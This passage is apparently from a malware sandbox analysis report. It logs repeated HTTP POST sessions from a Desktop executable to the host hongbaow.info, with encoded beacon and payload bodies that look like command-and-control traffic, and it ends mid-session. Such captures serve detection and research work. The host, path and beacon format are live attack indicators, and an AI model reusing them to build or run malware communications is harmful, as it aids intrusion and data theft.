                            2025-01-22 07:36:40 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:41 UTC803INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:41 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mL9qJo7cSE6sxYz9ZMmPbD5ETAVYN7Yavod9fWVqjIv3idFwIIlqy67BMvaQTjS9WVL0RrQdbMtM9KtROQgGNjAUgzprNgTzcuThdg9yqQ4DM5d2MsDkzqDaQk%2Bvc69F"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddfd7ae5c7c6a-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1792&min_rtt=1786&rtt_var=682&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=952&delivery_rate=1589548&cwnd=218&unsent_bytes=0&cid=cfd7407f0f695541&ts=331&x=0"
                            2025-01-22 07:36:41 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            62192.168.2.450065104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:41 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:41 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:42 UTC807INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:42 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jKCwYkuakEqv9wo5oj0FvbdskBPuf%2Bt2xs1cCfqzQsyx9HrFNrQl6WawgxK7ABblGzWelxvtq5tE%2FmXBcvh%2Bl5DdIVdVFOfqPd2maw0QY3JQXGwwaXfaQ6tb09QA6EFP"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddfdd69084414-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1603&rtt_var=621&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1733966&cwnd=180&unsent_bytes=0&cid=e32e12bae101f61b&ts=316&x=0"
                            2025-01-22 07:36:42 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            63192.168.2.450066104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:41 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 313
                            Cache-Control: no-cache
                            2025-01-22 07:36:41 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                            Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                            2025-01-22 07:36:42 UTC812INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:42 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0dDd%2FQBZ2AcKrIimYY4OIm7T4vHaQJ%2F79fyYP4NWlKRXEHdrhXAoNDXAqBgsi2RwQf2HVVqMW%2B%2BwZ8aJGfNgfxWuvim5VGXJkLI9CeXKvjq%2BusV1h5lQHHmOrAk92nAV"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddfde19a7c358-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1463&min_rtt=1455&rtt_var=561&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1170&delivery_rate=1922317&cwnd=155&unsent_bytes=0&cid=c3a88df38eb64a29&ts=342&x=0"
                            2025-01-22 07:36:42 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            64192.168.2.450067104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:42 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:42 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:43 UTC809INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:42 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RMLwTTWOTLlzVDYKWDk4JGPvfR1rMo%2BAbrdJnp8V0WZ59zKMAH9Pfhtsz6XinN0o0dA8Gc2R%2BnbcokM1pugqYbV9OYaqS2Crem3iKQ6jhSsUL%2F61MeI3q7iJ0%2Ba7KvxT"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddfe36daa8ca5-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1866&min_rtt=1858&rtt_var=713&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=952&delivery_rate=1516095&cwnd=237&unsent_bytes=0&cid=48eead1636a779e2&ts=321&x=0"
                            2025-01-22 07:36:43 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            65192.168.2.450068104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:43 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:43 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:43 UTC803INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:43 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Edd2MZzR94n8n2gNbWOO1Yebe60b0p5FJLzRVxxmJPxKjjiudiE9RbeAuT2EgvklLxa3v8PW2wsRSixA2mafqaD0qVrngVfd97dQswO%2Fl3K6SZnZwss3yVd0xDFlqaul"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddfe8fddd4414-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1999&min_rtt=1638&rtt_var=872&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=952&delivery_rate=1782661&cwnd=180&unsent_bytes=0&cid=9fd93a238a654dfe&ts=317&x=0"
                            2025-01-22 07:36:43 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            66192.168.2.450069104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:44 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:44 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:44 UTC809INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:44 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cqSzg%2FNmJWBjT9p887OKqnjfeAuWrYOFP%2BXKKeaQ%2BFHHvKmyF%2Bdlkv2TVqI2Agc7Z4x08guvmRDofzvDSKTro07w8Z9CfxieyJLU1iS6goQrGRTfd9VzJu9gjljLFt6v"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddfee6bc4de95-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1436&min_rtt=1431&rtt_var=547&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1979661&cwnd=246&unsent_bytes=0&cid=5c14ebc420e75463&ts=328&x=0"
                            2025-01-22 07:36:44 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            67192.168.2.450070104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:45 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:45 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:45 UTC813INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:45 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LcPKZEfcVJBxi9C7dXLcZIS75mJtQ0Tai48KTFH05%2F%2FAg%2FIvbPMSvpMWAKWllUr3D%2F1tPM37XZv52lYtawPlZVkHnOqtZ4PTGYCGZNzzmzTOznIDSv9ftPOnnFsC%2F7%2Bm"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddff3e8c4de95-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1433&min_rtt=1429&rtt_var=545&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1993174&cwnd=246&unsent_bytes=0&cid=33850624ffb2279d&ts=314&x=0"
                            2025-01-22 07:36:45 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            68192.168.2.450071104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:46 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:46 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:46 UTC813INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:46 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lEBirO2W3bO%2FTzN9fikZ2GDcLWPyst%2Fqi1xSwhpcu%2Bo08PPyBlEJjsSLOg0btOsxVUrVTu%2BUCYlBzwm93aOmcyIxMNkPOxNzHlDg%2BCpgWABq%2BuH7PPl9j1W1I49A3rXS"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddff95cd48ca5-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1789&min_rtt=1785&rtt_var=677&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1607044&cwnd=237&unsent_bytes=0&cid=4e1808fd777f0900&ts=328&x=0"
                            2025-01-22 07:36:46 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            69192.168.2.450072104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:47 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:47 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:47 UTC805INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:47 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g2QAHRrU3n4t3L8kNH39uO5HvSW4WLmJ39O2eQEKgjkDpk%2F7L2tZE3RO70Jzft3UnEXr715Gmb5RM42S0ZS8g63SCyRWREaCjrBmmcrTiWXZ4gdU16znHpCbIw7Y4%2FyL"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddffedba342eb-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1557&min_rtt=1550&rtt_var=596&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=952&delivery_rate=1812538&cwnd=215&unsent_bytes=0&cid=5428f913de249fef&ts=319&x=0"
                            2025-01-22 07:36:47 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            70192.168.2.450073104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:47 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 313
                            Cache-Control: no-cache
                            2025-01-22 07:36:47 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                            Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                            2025-01-22 07:36:48 UTC816INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:47 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jNJ%2B8F0ojXCIuTcRwgJ9KMojHn%2BM4%2FGz17s2j6Lp90kVx1AKe%2BCfVEZkAf8mdCwwtV9MATIBMpo%2FaItPRYUW%2F8W4bku6veozxEBCDrtJ206QmmCMQbVVLTjXao3%2BiMz2"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905de0028ccfc358-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1474&min_rtt=1468&rtt_var=562&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1170&delivery_rate=1926121&cwnd=155&unsent_bytes=0&cid=a1ecf2c21714c14d&ts=343&x=0"
                            2025-01-22 07:36:48 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            71192.168.2.450074104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:47 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:47 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:48 UTC275INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:48 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Server: cloudflare
                            X-Powered-By: PHP/7.4.33
                            Cf-Cache-Status: DYNAMIC
                            CF-RAY: 905de0042db342eb-EWR
                            alt-svc: h3=":443"; ma=86400
                            2025-01-22 07:36:48 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            72192.168.2.450075104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:48 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:48 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:49 UTC807INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:49 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RG4Boudi%2FA27Y9rOn8Cdsj0pRViuJCWvsWOi7qUEMcqeGYkhCcdw2tAVVevebvST2UGmoFKJzigmYfCpHZe%2FQbZeIyOwfUoAmK1AJcUZyrMSVCkvIIOK%2FCZU0bwOPS8J"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905de009a98a8ca5-EWR
                            alt-svc: h3=":443"; ma=86400
